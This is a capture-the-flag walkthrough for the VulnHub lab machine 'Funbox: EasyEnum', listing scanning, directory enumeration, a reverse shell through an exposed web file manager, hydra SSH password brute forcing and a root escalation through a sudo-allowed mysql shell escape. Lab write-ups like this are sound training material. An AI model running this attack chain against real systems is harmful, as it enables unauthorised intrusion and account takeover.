Machine Link : https://www.vulnhub.com/entry/funbox-easyenum,565/ STEP01 arp-scan -l FINDING 192.168.31.172 -------------------------------------------------------------------------------- STEP02 nmap -sSV -A -Pn 192.168.31.172 FINDING 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) -------------------------------------------------------------------------------- STEP03 gobuster dir -u http://192.168.31.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt FINDING /.php (Status: 403) [Size: 279] /javascript (Status: 301) [Size: 321] [-- http://192.168.31.172/javascript/] /mini.php (Status: 200) [Size: 4443] /robots.txt (Status: 200) [Size: 21] /secret (Status: 301) [Size: 317] [-- http://192.168.31.172/secret/] /phpmyadmin (Status: 301) [Size: 321] [-- http://192.168.31.172/phpmyadmin/] /.php (Status: 403) [Size: 279] /server-status (Status: 403) [Size: 279] Progress: 661680 / 661683 (100.00%) -------------------------------------------------------------------------------- STEP04 http://192.168.31.172/mini.php? FINDING you will see list of file with mini.php as well on right side of the list of mini.php file select edit form dropdownlist box and press buttom on right to edit paste a reverse shell code and hit the go button at the bottom might be more than once open nc -nvlp 1234 on new terminal and get the reverse shell -------------------------------------------------------------------------------- STEP05 cd /home FINDING drwxr-xr-x 4 goat goat 4096 Sep 19 2020 goat drwxr-xr-x 2 harry harry 4096 Sep 19 2020 harry drwxr-xr-x 4 karla karla 4096 Sep 18 2020 karla drwxr-xr-x 2 oracle oracle 4096 Sep 18 2020 oracle drwxr-xr-x 2 sally sally 4096 Sep 19 2020 sally -------------------------------------------------------------------------------- STEP06 paste the users in a file and brutforce with hydra to get ssh password hydra -L /root/Desktop/dc9users.txt -P /usr/share/wordlists/rockyou.txt -s 22 192.168.31.172 ssh FINDING [22][ssh] host: 192.168.31.172 login: goat password: thebest -------------------------------------------------------------------------------- STEP07 on reverse shell on a terminal su goat password : thebest -------------------------------------------------------------------------------- STEP08 goat@funbox7:/home/karla$ sudo -l FINDING (root) NOPASSWD: /usr/bin/mysql -------------------------------------------------------------------------------- STEP09 https://gtfobins.github.io/gtfobins/mysql/#shell FINDING mysql -e \! /bin/sh -------------------------------------------------------------------------------- STEP10 sudo -u root /usr/bin/mysql -e \! /bin/sh whoami root cd /root ls -la cat root.flag █████▒ █ ██ ███▄ █ ▄▄▄▄ ▒█████ ▒██ ██▒ ▓██ ▒ ██ ▓██▒ ██ ▀█ █ ▓█████▄ ▒██▒ ██▒▒▒ █ █ ▒░ ▒████ ░ ▓██ ▒██░▓██ ▀█ ██▒▒██▒ ▄██▒██░ ██▒░░ █ ░ ░▓█▒ ░ ▓▓█ ░██░▓██▒ ▐▌██▒▒██░█▀ ▒██ ██░ ░ █ █ ▒ ░▒█░ ▒▒█████▓ ▒██░ ▓██░░▓█ ▀█▓░ ████▓▒░▒██▒ ▒██▒ ▒ ░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░ ░ ░░▒░ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░ ▒ ▒░ ░░ ░▒ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▓█████ ▄▄▄ ██████ ▓██ ██▓▓█████ ███▄ █ █ ██ ███▄ ▄███▓ ▓█ ▀ ▒████▄ ▒██ ▒ ▒██ ██▒▓█ ▀ ██ ▀█ █ ██ ▓██▒▓██▒▀█▀ ██▒ ▒███ ▒██ ▀█▄ ░ ▓██▄ ▒██ ██░▒███ ▓██ ▀█ ██▒▓██ ▒██░▓██ ▓██░ ▒▓█ ▄ ░██▄▄▄▄██ ▒ ██▒ ░ ▐██▓░▒▓█ ▄ ▓██▒ ▐▌██▒▓▓█ ░██░▒██ ▒██ ░▒████▒ ▓█ ▓██▒▒██████▒▒ ░ ██▒▓░░▒████▒▒██░ ▓██░▒▒█████▓ ▒██▒ ░██▒ ░░ ▒░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ██▒▒▒ ░░ ▒░ ░░ ▒░ ▒ ▒ ░▒▓▒ ▒ ▒ ░ ▒░ ░ ░ ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ▓██ ░▒░ ░ ░ ░░ ░░ ░ ▒░░░▒░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ...solved ! --------------------------------------------------------------------------------